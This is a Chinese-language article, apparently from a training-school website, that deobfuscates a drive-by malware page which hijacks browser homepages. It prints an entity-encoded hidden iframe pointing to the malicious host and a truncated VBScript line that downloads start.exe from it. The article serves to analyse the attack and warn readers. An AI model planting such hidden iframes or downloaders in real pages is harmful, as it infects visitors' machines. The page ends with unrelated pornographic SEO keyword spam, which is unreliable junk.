面對網站惡意病毒我們該怎么辦?

        前不久,很多網友都感染了網站的病毒,首頁被改成這個網站,并且無法改回。黑客是如何做到鎖定用戶的瀏覽器首頁呢?下面我們就去探個究竟。

        提醒:分析病毒存在一定風險,建議在虛擬機下操作。

        第一步 查看病毒網站首頁的源代碼,可以發現在尾部有如下的字樣:

        <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

        這是一個嵌入到7b網址之家首頁的頁面,即打開網站也就同時打開了這個頁面。

        而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一個字符串,“&#”后面是每個字符串ASCII的十進制值。

        直接把這段亂碼保存為HTM文件,用IE打開,就可以看到它的真實面目“http : // m.dashow.com.cn / m.html”。

        第二步 查看http : // m.dashow.com.cn / m.html的源代碼,把看的<scrtipt>腳本段中的Execute替換為Document.Write,然后打開這個HTM頁面,就會出現一段代碼,同樣地,把EXECUTE換成我們無敵的Document.Write,前后加腳本標記,存HTM打開。屏幕上立即出現了一段令人眼花的東西。把眼花繚亂的東西整理一下,并將出現的CHR()在前面用到過,作用是把字符的ASCII轉成字符,只不過這次是16進制。然后再將字符拼接成字符串,然后再Execute運行這個命令字符串。繼續用Document.Write替換掉EXECUTE,前后加腳本標記,存HTM打開。

        第三步 經過上幾步的還原后終于看到了這個惡意頁面的最終面目。

        on error resume next curl = "http : // m.dashow.com.cn / start.exe"……其后省略。

        這段代碼中我們可以很清楚地看到http : // m.dashow.com.cn / start.exe這個鏈接。沒錯,它就是運行后可以將用戶主頁鎖定為網站的病毒。

        可以用下載工具將這個文件下載下來,如果你的殺毒軟件查不到的話最好立即上報。這樣可以保證殺毒軟件快速查殺這個病毒,并使更少的網友免受該病毒的侵害。

      北大青鳥網上報名
      北大青鳥招生簡章
      主站蜘蛛池模板: 一区二区三区免费看| 亚拍精品一区二区三区| 亚洲香蕉久久一区二区三区四区| 日本一区中文字幕日本一二三区视频| 麻豆文化传媒精品一区二区| 亚洲一区二区三区自拍公司| 一区二区三区免费在线视频| 无码精品人妻一区二区三区影院| 午夜性色一区二区三区不卡视频 | 国产乱码精品一区三上| 精品国产一区二区三区香蕉事| 精品国产日韩一区三区| 性色av无码免费一区二区三区| 在线视频一区二区三区四区| 无码aⅴ精品一区二区三区| 色一情一乱一伦一区二区三区| 精品一区中文字幕| 国产日韩一区二区三免费高清| 日韩人妻不卡一区二区三区 | 激情亚洲一区国产精品| 无码少妇一区二区浪潮免费| 亚洲AV无码国产一区二区三区| 福利在线一区二区| 日韩人妻无码一区二区三区久久| 亚洲一区精彩视频| 中文字幕aⅴ人妻一区二区| 亚洲视频一区二区三区四区| 一区二区不卡久久精品| 无码人妻精品一区二区三区夜夜嗨| 无码中文人妻在线一区二区三区 | 一区二区三区在线|欧| 国产主播一区二区三区 | 久久91精品国产一区二区| 性色AV一区二区三区无码| 性色AV一区二区三区| 精品乱码一区内射人妻无码| 精品一区二区三区四区在线播放 | 亲子乱av一区区三区40岁| 国精品无码一区二区三区左线| 国产成人高清亚洲一区91| 91久久精品一区二区|